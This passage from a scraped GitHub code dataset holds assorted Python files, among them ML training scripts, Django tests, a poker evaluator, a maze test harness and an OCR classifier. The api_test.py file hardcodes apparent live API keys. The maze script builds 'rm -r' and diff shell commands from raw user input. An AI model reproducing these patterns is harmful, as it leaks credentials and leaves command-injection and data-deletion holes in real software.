exc:\n print(\"FAILED \" + self.name + \" link check: \" + str(exc))\n return self\n self.links = True\n if self.try_run():\n print(\"PASSED \" + self.name)\n else:\n print(\"FAILED \" + self.name + \" run check: \" + str(self.run_result.stderr))\n return self\n \n def __exit__(self, exc_type, exc_val, exc_tb):\n try:\n os.remove(self.c_name)\n if os.name == 'nt':\n os.remove(self.file_name + \".exe\")\n else:\n os.remove(self.file_name)\n for objfile in self.obj_names:\n os.remove(objfile)\n except Exception as exc:\n # Avoid noise for non existant files\n return","repo_name":"jweinst1/pysimd","sub_path":"check_c_compiles.py","file_name":"check_c_compiles.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"21440088650","text":"from django.core.urlresolvers import resolve\nfrom django.template.loader import render_to_string\nfrom django.test import TestCase\nfrom django.http import HttpRequest\nfrom carpool.models import Rider, Driver\nfrom carpool.views import home_page, new_user_page\n\n# Create your tests here.\nclass HomePageTest(TestCase):\n\n def test_root_url_resolves_to_home_page_view(self):\n found = resolve('/')\n self.assertEqual(found.func, home_page)\n\n def test_home_page_returns_correct_html(self):\n request = HttpRequest()\n response = home_page(request)\n expected_html = render_to_string('base.html')\n #self.assertEqual(response.content.decode(), expected_html)\n\n def test_home_page_saves_name_and_posts_to_new_page(self):\n request = HttpRequest()\n request.method = 'POST'\n\n request.POST['first_name_text'] = 'Ella'\n request.POST['last_name_text'] = 'Holmes'\n request.POST['start_text'] = 'New York'\n request.POST['end_text'] = 'Boston'\n request.POST['date_text'] = '1/1/11'\n\n response = new_user_page(request)\n\n self.assertIn('Ella', response.content.decode())\n self.assertIn('Holmes', response.content.decode())\n self.assertIn('New York', response.content.decode())\n self.assertIn('Boston', response.content.decode())\n self.assertIn('1/1/11', response.content.decode())\n","repo_name":"EllaHolmes/Carpool","sub_path":"superlists/carpool/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5746079809","text":"def first_non_repeating_letter(string):\n \"\"\"\n # https://www.codewars.com/kata/52bc74d4ac05d0945d00054e\n # First non-repeating character\n \"\"\"\n if len(string) == 1:\n return string\n\n ss = string[:].lower()\n for i in range(len(ss)-1):\n if ss.count(ss[i]) == 1:\n return string[i]\n\n return ''\n","repo_name":"ioneov/codewars_kata","sub_path":"5kyu/first_non_repeating_letter.py","file_name":"first_non_repeating_letter.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24361060036","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Test figure 4ab\"\"\"\n\nimport inspect\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .utils import dump_values, load_values, PLOT_DIR\nfrom tdsr import CFM, RSD, TDSR1\nfrom tdsr.loading import StepLoading\nfrom tdsr.utils import Eq7\n\n\ndef plot_fig4ab(\n out,\n t,\n t0,\n tstart,\n tend,\n sstep,\n strend,\n cfs,\n cf_shad,\n r_tdsr,\n r_lcm,\n r_rsd,\n R_TDSR_theory,\n chi0,\n depthS,\n):\n # make a bigger global font size and sans-serif style\n plt.rc(\"font\", family=\"sans-serif\")\n plt.rc(\"font\", size=12)\n plt.rc(\"legend\", fontsize=10)\n fig, ax = plt.subplots(2, 1, figsize=(7, 6))\n plt.subplots_adjust(hspace=0.0)\n\n al = (0.8, 0.2)\n good = t > 0.0\n for i, Sstep in enumerate(sstep):\n ax[0].plot(t, cf_shad[i, :], c=\"k\", ls=\"solid\", lw=1.5, alpha=al[i])\n ax[0].plot(\n t,\n cfs[i, :],\n c=\"k\",\n ls=\"solid\",\n lw=2,\n alpha=al[i],\n label=r\"$\\Delta\\sigma_c / \\delta\\sigma$=%.1f\" % (Sstep),\n )\n\n ax[0].axhline(0, c=\"gray\", ls=\"dotted\", lw=1)\n ax[0].set_xticks([])\n ax[0].set_xlim(tstart, tend)\n ax[0].set_ylim(-5, 1.1 * (strend * tend))\n ax[0].set_ylabel(r\"$\\sigma_c(t) - \\sigma_c(0)$\")\n ax[0].legend()\n ax[0].text(\n -0.18,\n 0.93,\n \"(a)\",\n fontsize=14,\n color=\"k\",\n horizontalalignment=\"left\",\n transform=ax[0].transAxes,\n )\n\n for i, Sstep in enumerate(sstep):\n if i == 0:\n ax[1].plot(\n t, r_tdsr[i, :], c=\"b\", ls=\"solid\", lw=3, alpha=al[i], label=\"TDSR, RS\"\n )\n ax[1].plot(\n t, r_lcm[i, :], c=\"g\", ls=\"dashed\", lw=1, alpha=al[i], label=\"CF\"\n )\n else:\n ax[1].plot(t, r_tdsr[i, :], c=\"b\", ls=\"solid\", lw=3, alpha=al[i])\n ax[1].plot(t, r_lcm[i, :], c=\"g\", ls=\"dashed\", lw=1, alpha=al[i])\n ax[1].plot(t[good], R_TDSR_theory[i, good], c=\"r\", ls=\"dashed\", lw=1)\n\n ax[1].set_xlim(tstart, tend)\n ax[1].set_ylim(0, 1.1 * chi0 * strend)\n ax[1].set_xlabel(r\"Time $t$ / ($\\delta\\sigma / \\dot\\sigma_c$)\")\n ax[1].set_ylabel(\"Seismicity rate $R$ / $r_0$\")\n ax[1].legend()\n ax[1].text(\n -0.18,\n 0.93,\n \"(b)\",\n fontsize=14,\n color=\"k\",\n horizontalalignment=\"left\",\n transform=ax[1].transAxes,\n )\n\n fig.savefig(str(out) + \".pdf\", format=\"pdf\", dpi=300, bbox_inches=\"tight\")\n fig.savefig(str(out) + \".png\", format=\"png\", dpi=300, bbox_inches=\"tight\")\n\n\ndef test_fig4ab():\n tdsr = TDSR1()\n cfm = CFM()\n rsd = RSD()\n\n # time unit\n hours = 1.0\n # (=-dsig) skin depth in MPa\n # must be negative, will be changed with next release\n depthS = -1.0\n # mean failure time in sec for critically stressed source t0 = 1.0\n # (=dotsigc) in MPa/timeunit: tectonic stressing rate before loading\n strend = 1.0\n # susceptibility to trigger critically stressed sources\n # if a unit step increas is applied (r0 = chi0*strend)\n chi0 = 1.0\n\n # stress steps applied at time tstep, in MPa\n # formerly Sstepvalues = (-2.0, -4.0)\n sstep = [\n -2.0,\n -4.0,\n ]\n tstep = 0.0 * hours\n tstep = 0.01 * hours\n\n # simulation start\n tstart = -1.0 * hours\n # simulation end\n tend = 10.0 * hours\n\n deltat = 0.02 * hours\n t0 = deltat\n # =NT = len(t)\n nt = int(np.ceil((tend - tstart) / deltat))\n\n # linear time axis\n taxis_log = False\n\n # discretizing stress axis for integration\n # increment do discretize Coulomb stress axis\n deltaS = -depthS / 60.0\n # maximum depth on Coulomb axis (limit of integral)\n sigma_max = 3000.0 * deltaS\n\n # calculare earthquake rates\n cfs = np.zeros((2, nt))\n cf_shad = np.zeros((2, nt))\n r_tdsr = np.zeros((2, nt))\n r_lcm = np.zeros((2, nt))\n r_rsd = np.zeros((2, nt))\n R_TDSR_theory = np.zeros((2, nt))\n\n # calculate equilibrium distribution of tectonic loading,\n # to be used later to avoid initial oscillations\n # loading = BackgroundLoading(strend=strend)\n # t, chiz_background, cf, r, xn = tdsm(\n # loading=loading, chi0=chi0, depthS=depthS, deltaS=deltaS,\n # sigma_max=sigma_max, deltat=deltat, tstart=0, tend=tend)\n\n for i, Sstep in enumerate(sstep):\n loading = StepLoading(\n strend=strend,\n sstep=Sstep,\n tstep=tstep,\n taxis_log=taxis_log,\n deltat=deltat,\n tstart=tstart,\n tend=tend,\n )\n common = dict(\n loading=loading,\n chi0=chi0,\n t0=t0,\n depthS=depthS,\n deltaS=deltaS,\n sigma_max=sigma_max,\n iX0=\"equilibrium\",\n deltat=deltat,\n taxis_log=taxis_log,\n tstart=tstart,\n tend=tend,\n )\n\n t, chiz, cf, r, xn = tdsr(**common)\n cfs[i, :] = cf[:]\n r_tdsr[i, :] = r[:]\n\n # BUG: cf_shadow is written here, but cf_shad is plotted (zeros only)!\n t, cf_shadow, cf, r, xn = rsd(**common)\n r_rsd[i, :] = r\n\n t, chiz, cf, r, xn = cfm(**common)\n r_lcm[i, :] = r\n\n R_TDSR_theory[i, :] = Eq7(t, sstep[i], chi0 * strend, -depthS, strend, strend)\n\n test_name = inspect.currentframe().f_code.co_name\n\n # plot values\n plot_fig4ab(\n out=PLOT_DIR / test_name,\n t=t,\n t0=t0,\n tstart=tstart,\n tend=tend,\n sstep=sstep,\n strend=strend,\n cfs=cfs,\n cf_shad=cf_shad,\n r_tdsr=r_tdsr,\n r_lcm=r_lcm,\n r_rsd=r_rsd,\n R_TDSR_theory=R_TDSR_theory,\n chi0=chi0,\n depthS=depthS,\n )\n\n # dump values\n values = dict(\n cfs=cfs,\n cf_shad=cf_shad,\n r_tdsr=r_tdsr,\n r_lcm=r_lcm,\n r_rsd=r_rsd,\n R_TDSR_theory=R_TDSR_theory,\n )\n dump_values(key=test_name, values=values, overwrite=False)\n\n # assert correct values\n values = load_values(key=test_name)\n assert np.allclose(values[\"cfs\"], cfs)\n assert np.allclose(values[\"cf_shad\"], cf_shad)\n assert np.allclose(values[\"r_tdsr\"], r_tdsr)\n assert np.allclose(values[\"r_lcm\"], r_lcm)\n assert np.allclose(values[\"r_rsd\"], r_rsd)\n assert np.allclose(values[\"R_TDSR_theory\"], R_TDSR_theory)\n","repo_name":"torstendahm/tdsr","sub_path":"tests/test_fig4ab.py","file_name":"test_fig4ab.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13542377777","text":"import torch\nimport json\nfrom pathlib import Path\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nfrom constants import DIALOGUE_ANNOTATOR_DATASETS_DIR, DIALOGUE_ANNOTATOR_PRETRAIN_DATA_DIR, BERT_PRETRAINED_MODEL, \\\n DIALOGUE_EXPERIMENTS_DIR, MAX_SENTIMENT_SEQ_LENGTH\nfrom Dialogue_Annotator.pipeline.bert_classifier import DebiasedBertPretrainedClassifier, LightningHyperparameters\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom argparse import ArgumentParser\nfrom utils import init_logger\nfrom Sentiment_Adjectives.pipeline.predict import predict_models, print_final_metrics\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n### Constants\nBATCH_SIZE = 16\n# BATCH_SIZE = 8\nACCUMULATE = 1\nDROPOUT = 0.1\nEPOCHS = 50\n# EPOCHS = 1\nFP16 = False\n\n\ndef downstream_task_finetuning_phase2(args):\n data_file = args.pregenerated_data / f\"{BERT_PRETRAINED_MODEL}_epoch_0.json\"\n metrics_file = args.pregenerated_data / f\"{BERT_PRETRAINED_MODEL}_epoch_0_metrics.json\"\n assert data_file.is_file() and metrics_file.is_file()\n metrics = json.loads(metrics_file.read_text())\n num_samples = metrics['num_training_examples']\n\n hparams = {\n \"data_path\": DIALOGUE_ANNOTATOR_DATASETS_DIR,\n \"dataset\": args.dataset,\n \"treatment\": \"DST\",\n \"masking_method\": args.masking_method,\n \"pretrain_control\": args.pretrained_control,\n \"text_column\": \"dialogue_history\",\n \"label_column\": \"ent_labels\",\n \"batch_size\": args.batch_size,\n \"epochs\": args.epochs,\n \"accumulate\": ACCUMULATE,\n \"num_training_examples\": num_samples,\n \"max_seq_len\": MAX_SENTIMENT_SEQ_LENGTH,\n \"name\": f\"Entity_Prediction\",\n \"ckpt_path\": f\"/Users/shiquan/PycharmProjects/deBiasing-Dialogue/Dialogue_Annotator/pipeline/entity-prediction-models-from-scratch/entity-prediction_ckpt_epoch_1.ckpt\",\n \"bert_params\": {\n \"dropout\": DROPOUT,\n \"bert_state_dict\": None,\n \"name\": f\"Entity_Prediction\"\n }\n }\n\n print(f\"Training {hparams['name']} models\")\n\n if hparams[\"bert_params\"][\"bert_state_dict\"]:\n if args.pretrained_control:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction_DST_UI_Treated\"\n else:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction_DST_Treated\"\n else:\n hparams[\"bert_params\"][\"name\"] = f\"Entity_Prediction\"\n\n OUTPUT_DIR = f\"{DIALOGUE_EXPERIMENTS_DIR}/{hparams['treatment']}/{hparams['bert_params']['name']}\"\n checkpoint_callback = ModelCheckpoint(\n monitor='val_accuracy',\n filepath='entity-prediction-phase2-models',\n prefix='entity-prediction',\n mode='max',\n save_best_only=False\n )\n early_stopping_callback = EarlyStopping('val_accuracy', patience=5, mode='max')\n trainer = Trainer(gpus=1 if DEVICE.type == \"cuda\" else 0,\n default_save_path=OUTPUT_DIR,\n show_progress_bar=True,\n accumulate_grad_batches=hparams[\"accumulate\"],\n max_nb_epochs=hparams[\"epochs\"],\n early_stop_callback=early_stopping_callback,\n checkpoint_callback=checkpoint_callback)\n hparams['output_path'] = trainer.logger.experiment.log_dir.rstrip('tf')\n logger = init_logger(\"training\", hparams['output_path'])\n logger.info(f\"Training Entity_Prediction for {hparams['epochs']} epochs\")\n hparams[\"bert_params\"][\"batch_size\"] = hparams[\"batch_size\"]\n model = DebiasedBertPretrainedClassifier(LightningHyperparameters(hparams))\n trainer.fit(model)\n trainer.test()\n print_final_metrics(hparams[\"bert_params\"][\"name\"], trainer.tqdm_metrics, logger)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('--pregenerated_data', type=Path, required=False)\n parser.add_argument(\"--dataset\", type=str, default=\"multiwoz\", choices=(\"multiwoz\",\"sgd\"),\n help=\"Specify dataset for experiments\")\n parser.add_argument(\"--group\", type=str, default=\"F\", choices=(\"F\", \"CF\"),\n help=\"Specify data group for experiments: F (factual) or CF (counterfactual)\")\n parser.add_argument(\"--masking_method\", type=str, default=\"mlm_prob\", choices=(\"double_num_adj\", \"mlm_prob\"),\n help=\"Method of determining num masked tokens in sentence\")\n parser.add_argument(\"--pretrained_epoch\", type=int, default=0,\n help=\"Specify epoch for pretrained models: 0-4\")\n parser.add_argument(\"--pretrained_control\", action=\"store_true\",\n help=\"Use pretraining model with control task\")\n parser.add_argument(\"--batch_size\", type=int, default=BATCH_SIZE,\n help=\"Batch size for training\")\n parser.add_argument(\"--epochs\", type=int, default=EPOCHS,\n help=\"Number of epochs to train for\")\n args = parser.parse_args()\n\n args.pregenerated_data = Path(DIALOGUE_ANNOTATOR_PRETRAIN_DATA_DIR) / args.masking_method\n\n downstream_task_finetuning_phase2(args)\n\n\nif __name__ == '__main__':\n main()","repo_name":"shiquanyang/Robust-Dialogue","sub_path":"pipeline/training_phase2.py","file_name":"training_phase2.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36243449002","text":"import requests\r\nimport json\r\nimport datetime\r\nimport hashlib\r\n\r\ndef get_time_stamp():\r\n\treturn datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n\r\napi_key = \"0GVM6gyA-GbCfp7dSg1YDixAw0Pu51ECtPRxdH_k7wFXKz66U9sYox2XKlVtEZH1\"\r\napi_key2 = \"_tHUemb1Kr-E36Hhv7ToGC1RyTjkmatfWA6nUADrC1vYnwIY6G_-z7NjeOefrgpZ\"\r\nsensor_id = \"test\"\r\nsensor_id2 = \"OUjb9xP5fYH32qbW\"\r\ntime_stamp = get_time_stamp()\r\n\r\nheader = {\"content-type\": \"application/json\"}\r\n\r\ntest_data = {\"type\": \"test\", \"values\": {\"Test Value\": {\"value\": 64, \"max\": 100, \"type\": \"test\"}}}\r\ntest_data2 = {\"type\": \"test\", \"values\": {\r\n\t\"Charger 1\": {\"value\": 42, \"max\": 100, \"type\": \"test\"},\r\n\t\"Charger 2\": {\"value\": 25, \"max\": 100, \"type\": \"test\"},\r\n\t\"Charger 3\": {\"value\": 2, \"max\": 100, \"type\": \"test\"}\r\n}}\r\n\r\nrequest_json = {\r\n\t\t\t\t\"sensor_id\": sensor_id,\r\n\t\t\t\t\"time_stamp\": str(time_stamp),\r\n\t\t\t\t\"verification\": hashlib.sha256(str(time_stamp + api_key).encode()).hexdigest(),\r\n\t\t\t\t\"data\": test_data\r\n\t\t\t\t}\r\n\r\n# Making a PUT request\r\nr = requests.put('http://larby.co.uk/sensor-api/update/', data=json.dumps(request_json), headers=header)\r\n\r\n# check status code for response received\r\n# success code - 200\r\nprint(r)\r\n\r\n# print content of request\r\nprint(r.content)","repo_name":"mattl1598/project-cherry-pi","sub_path":"api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40508651130","text":"from collections import Counter\n\n\ndef compute(path: str) -> int:\n def is_flush(suits: list[str, ...]) -> bool:\n return len(set(suits)) == 1\n\n def is_royal(values: list[str, ...]) -> bool:\n return sum(values) == 50\n\n def is_consecutive(values: list[str, ...], hand_value: int) -> bool:\n return sum(values) == 5 * (hand_value - 2)\n\n def get_rank_value(counted_values: Counter) -> int:\n return max(value for value, kinds in counted_values.items() if kinds == max(counted_values.values()))\n\n def get_rank(cards: list[str, ...]) -> (str, int, int):\n values, suits = [card_ranks[card[0]] for card in cards], [card[1] for card in cards]\n counted_values, hand_value = Counter(values), max(values)\n unique_values = len(counted_values)\n if unique_values == 5:\n if is_flush(suits):\n if is_consecutive(values, hand_value):\n rank = 'Royal Flush' if is_royal(values) else 'Straight Flush'\n else:\n rank = 'Flush'\n elif is_consecutive(values, hand_value):\n rank = 'Straight'\n else:\n rank = 'High Card'\n rank_value = hand_value\n else:\n if unique_values == 4:\n rank = 'One Pair'\n elif unique_values == 3:\n rank = 'Three of a Kind' if max(counted_values.values()) == 3 else 'Two Pairs'\n else:\n rank = 'Four of a Kind' if max(counted_values.values()) == 4 else 'Full House'\n rank_value = get_rank_value(counted_values)\n return rank, rank_value, hand_value\n\n def is_winner(hands: list[str, ...]) -> bool:\n player_1, player_2 = map(get_rank, [hands[:5], hands[5:]])\n if hand_ranks[player_1[0]] > hand_ranks[player_2[0]]:\n return True\n elif hand_ranks[player_1[0]] == hand_ranks[player_2[0]]:\n if player_1[1] > player_2[1]:\n return True\n elif player_1[1] == player_2[1]:\n return player_1[2] > player_2[2]\n return False\n\n hand_ranks = {hand: rank for rank, hand in enumerate(['High Card', 'One Pair', 'Two Pairs', 'Three of a Kind',\n 'Straight', 'Flush', 'Full House', 'Four of a Kind',\n 'Straight Flush', 'Royal Flush'])}\n card_ranks = {card: rank for rank, card in enumerate(['2', '3', '4', '5', '6', '7', '8', '9', 'T', 'J', 'Q', 'K',\n 'A'])}\n return sum(map(is_winner, [i.split(' ') for i in open(path).read().split('\\n')]))\n","repo_name":"Dynortice/Project-Euler","sub_path":"problems/0054/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26650204220","text":"from PIL import Image\n\n\ndef to_rgb(path, to_color: tuple[int, int, int], save_path):\n final_color = [val/256 for val in to_color]\n image: Image.Image = Image.open(path).convert(\"L\")\n new_image = Image.new(\"RGBA\", image.size)\n for y in range(image.height):\n for x in range(image.width):\n pixel = image.getpixel((x, y))\n vals = tuple(int(val*pixel) for val in final_color)+(255, )\n if vals == (0, 0, 0, 255):\n vals = (*to_color, 100)\n new_image.putpixel((x, y), vals)\n new_image.save(save_path)\n\n\nif __name__ == '__main__':\n for name in [\"spruce\"]:\n path = f\"src/leaves/{name}_leaves.png\"\n save_path = f\"../src/blocks/vegetation/leaves/{name}_leaves.png\"\n to_rgb(path, (0, 100, 0), save_path)\n","repo_name":"AlphaNow37/PyCraft","sub_path":"creator_tools/to_RGB_img.py","file_name":"to_RGB_img.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"9814629402","text":"#coding=utf-8\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\n\n\nfrom random import seed, choice, randint\nimport os\nimport sys\nimport difflib\nimport argparse\n\ndef readfile(filename):\n try:\n with open(filename, 'r') as fileHandle:\n text = fileHandle.read().splitlines()\n return text\n except IOError as e:\n print(\"Read file Error:\", e)\n sys.exit()\n\narg_for_seed = input('Please input a seed:')\nfile_name = input('Please input the name of file that you want to create to store txt and tex files: ').split()\nfile_name = '_'.join(file_name)\nprint(file_name)\nprint(\"检测并移除冲突文件夹\")\nos.system(f'rm -r {file_name}')\nos.mkdir(file_name)\nos.mkdir(file_name + '/tex')\n\ntimes = int(input('How many maze TXT do you want to generate?: '))\n\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\nall_blocks = ('0', '1', '2', '3')\nright_blocks = ('0', '2')\nbottom_blocks = ('0', '1')\nseed(arg_for_seed)\n\nfor i in range(times):\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\n num_of_rows = randint(2, 41)\n num_of_cols = randint(2, 31)\n with open(f'{file_name}/{file_name}_{i}.txt', 'w') as f:\n for row in range(num_of_rows - 1):\n for col in range(num_of_cols - 1):\n f.write(choice(all_blocks))\n f.write(choice(right_blocks) + '\\n')\n for col in range(num_of_cols - 1):\n f.write(choice(bottom_blocks))\n f.write('0')\n#Written by Ricky Qi and Xin Li for COMP9021 Assignment 2\nprint(f'txt documents have already out put to {file_name}')\nERR = []\nthe_analyse = []\na_err = []\nfor i in range(times):\n command = f'python3 -c \"from maze import *;maze = Maze(\\'{file_name}/{file_name}_{i}.txt\\');maze.display()\"'\n os.system(command)\n\n\n print(f\"正在处理... {file_name}_{i}.tex\")\n print(\"文件已经生成,开始比较...\")\n temp = os.popen(f'diff {file_name}/{file_name}_{i}.tex {file_name}_test/{file_name}_test_{i}.tex')\n info = temp.readlines()\n if len(info) != 0:\n print(f\"文件存在差异,已存储到{file_name}_report.txt\")\n ERR.append(f\"错误文件信息{file_name}_{i}.tex\")\n for line in info:\n print(line.strip())\n ERR.append(line.strip())\n else:\n print(\"文件无差异,Pass\")\nos.system(f'rm {file_name}_report.txt')\nprint(\"正在生成display()相关错误日志...\")\nwith open(f'{file_name}_display_report.txt', 'w') as f:\n for e in ERR:\n print(e, file = f)\n\n# Written by Ricky and Xin Li for COMP9021 Assignment 2\n\nprint(\"开始测试analyse模块\")\n\n\nfor i in range(times):\n command1 = f'python3 -c \"from maze import *;maze = Maze(\\'{file_name}/{file_name}_{i}.txt\\');maze.analyse()\"'\n analyse = os.popen(command1)\n info_analyse = analyse.readlines()\n the_analyse.append(f'{file_name}_{i}.txt')\n print(f'正在处理{file_name}_{i}.txt...')\n for line1 in info_analyse:\n the_analyse.append(line1.strip())\n\nprint(f\"将analyse()信息转储至文件{file_name}_analyse.txt中...\")\nwith open(f'{file_name}_analyse.txt', 'w') as f1:\n for x in the_analyse:\n print(x, file = f1)\n\ntext1 = readfile(f'{file_name}_analyse.txt')\ntext2 = readfile(f'{file_name}_test_analyse.txt')\nd = difflib.HtmlDiff()\nresult = d.make_file(text1, text2, f'{file_name}_analyse.txt', f'{file_name}_test_analyse.txt', context=True)\n\nwith open(f'{file_name}_analyse_report.html', 'w') as resultfile:\n resultfile.write(result)\n\n\n# Written by Ricky and Xin Li for COMP9021 Assignment 2\n","repo_name":"Jerenyaoyelu/Python-Programming---COMP9021","sub_path":"Assignment/2/P1/auto 2/maze_generator.py","file_name":"maze_generator.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"23652272025","text":"import pygame\nfrom pygame.sprite import Sprite\nclass Ship(Sprite):\n def __init__(self):\n super().__init__()\n '''initialization of remaining lives image'''\n self.image = pygame.image.load('images/shipBlack2.bmp')\n self.image.set_colorkey((0, 0, 0))\n self.rect = self.image.get_rect() \n\n \n \n \n \n","repo_name":"jimbojimih/Aliens-Invasion-with-mods","sub_path":"shipleft.py","file_name":"shipleft.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12064082715","text":"import os\nimport sys\nimport numpy as np\nimport soundfile as sf\nimport librosa\n\ndataset_path = sys.argv[1]\npresenter_name = sys.argv[2]\ntoken = sys.argv[3]\n\nobj_path = os.path.join(dataset_path, presenter_name)\nROOT = os.path.join(obj_path, f\"output_{token}\")\nprint(\"ROOT:\", ROOT)\nstart = 0\nend = -1\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/raw_filelist.txt\"), \"r\") as f:\n data = f.readlines()\n\ndata = [line.strip() for line in data]\ndata.sort()\ndata = data[start:]\nprint(\"Data\", start, len(data), len(data))\n\nerrors = []\nresults = []\nfor p in data:\n try:\n d = os.path.join(ROOT, p)\n frames = os.listdir(d)\n frames = [file for file in frames if \".jpg\" in file]\n frame_count = len(frames)\n vid_duration = frame_count/25\n # print(vid_duration)\n vid_name = d.split(\"/\")[-1]\n\n org_path = os.path.join(d, f\"{vid_name}.wav\")\n au_path = os.path.join(d, \"audio.wav\")\n synced_path = os.path.join(d, \"synced_audio.wav\")\n\n if not os.path.isfile(au_path):\n status = os.system(f\"ffmpeg -i {org_path} -ar 16000 {au_path}\")\n if status != 0:\n errors.append(p)\n continue\n if os.path.isfile(synced_path):\n continue\n\n au, sr = librosa.load(au_path, sr=16000)\n au_duration = au.shape[0]/sr\n\n extra = int(vid_duration * sr - au.shape[0])\n is_append = extra >= 0\n extra = abs(extra)\n new_au = au\n if extra > 0:\n front = False\n if (is_append):\n # append audio\n if front:\n new_au = np.concatenate([np.zeros(extra), au])\n else:\n new_au = np.concatenate([au, np.zeros(extra)])\n else:\n # cut audio\n if front:\n new_au = au[:-extra]\n else:\n new_au = au[extra:]\n sf.write(synced_path, new_au, sr)\n results.append(p)\n except Exception:\n print(p)\n errors.append(p)\nif not os.path.exists(os.path.join(obj_path, f\"filelist_{token}/temp\")):\n os.mkdir(os.path.join(obj_path, f\"filelist_{token}/temp\"))\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/temp/output_synced_{start}_{len(data)}.txt\"), \"w\") as f:\n for line in results:\n f.write(line + \"\\n\")\n\nwith open(os.path.join(obj_path, f\"filelist_{token}/temp/output_synced_errors_{start}_{len(data)}.txt\"), \"w\") as f:\n for line in errors:\n f.write(line + \"\\n\")","repo_name":"nghiakvnvsd/wav2lip_data_preprocessing","sub_path":"6_au_sync.py","file_name":"6_au_sync.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"25801207943","text":"def toys(w):\n \"\"\"Hackerrank Problem: https://www.hackerrank.com/challenges/priyanka-and-toys/problem\n\n Priyanka works for an international toy company that ships by container. Her task is to the determine the lowest\n cost way to combine her orders for shipping. She has a list of item weights. The shipping company has a requirement\n that all items loaded in a container must weigh less than or equal to 4 units plus the weight of the minimum weight\n item. All items meeting that requirement will be shipped in one container.\n\n Solve:\n We sort the array, and then we iterate through the list seeing if each order fits within the current lowest order's\n weight. If it does, we can continue on, and if it doesn't, we then create a new \"container\" as this order no\n longer fits within the previous order limit, and continue on through the orders.\n\n Args:\n w (list): Array representing the weighted orders\n\n Returns:\n int: The minimum number of containers needed to ship the orders\n \"\"\"\n containers = 1\n w.sort()\n cur_lowest = w[0]\n # Iterate through the sorted list, and add a container if the next weighted order doesn't fit within the current\n # lowest order's weight + 4\n for i in range(1, len(w)):\n if w[i] > cur_lowest + 4:\n cur_lowest = w[i]\n containers += 1\n return containers\n\n\nif __name__ == \"__main__\":\n print(toys([1, 2, 3, 21, 7, 12, 14, 21]))\n","repo_name":"kcc3/hackerrank-solutions","sub_path":"problem_solving/python/algorithms/greedy/priyanka_and_toys.py","file_name":"priyanka_and_toys.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5031193478","text":"\r\n#from tensorflow import keras\r\nimport cv2\r\nimport numpy as np \r\nimport os\r\n\r\n\r\n# from loss import*\r\n# from func import*\r\n\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"subtle-fulcrum-319206-415ab8f59c71.json\"\r\nfrom google.cloud import vision\r\nclient = vision.ImageAnnotatorClient()\r\nimport jieba\r\nimport re\r\n\r\nfolderlist = []\r\n\r\nfolderpath = './classify'\r\npath = './image'\r\n\r\nschool = ['大學','高中','國中','國小','二專','四技','學校','私立','公立']\r\n\r\n\r\n\r\nclass diplomaClassifier():\r\n def __init__(self):\r\n #self.cutModel = keras.models.load_model('unet_diploma_4.hdf5')\r\n #self.stampModel = keras.models.load_model('unet_stamp_rgb_300_15_binary.hdf5',custom_objects={'dice_coef_loss': dice_coef_loss})\r\n #self.stampModel = keras.models.load_model('unet_stamp_4.hdf5')\r\n self.text =[]\r\n self.tempSchool =''\r\n\r\n def run(self,file):\r\n self.img = cv2.imread('{}/{}'.format(path,file))\r\n \r\n #self.img = cv2.imread('./{}'.format(file))\r\n\r\n \r\n\r\n \"\"\"Detects text in the file.\"\"\"\r\n tempImg = self.img\r\n \r\n file = re.sub('[.jpg]', '', file)\r\n\r\n # 編碼用於傳輸\r\n success, encoded_image = cv2.imencode('.jpg', self.img)\r\n content = encoded_image.tobytes()\r\n\r\n # Call API\r\n image = vision.Image(content=content)\r\n response = client.text_detection(image=image)\r\n \r\n texts = response.text_annotations\r\n\r\n # 沒有偵測到字詞\r\n if len(texts) == 0:\r\n \r\n print('NO text')\r\n os.makedirs('./{}/unsorted/{}'.format(folderpath,file))\r\n 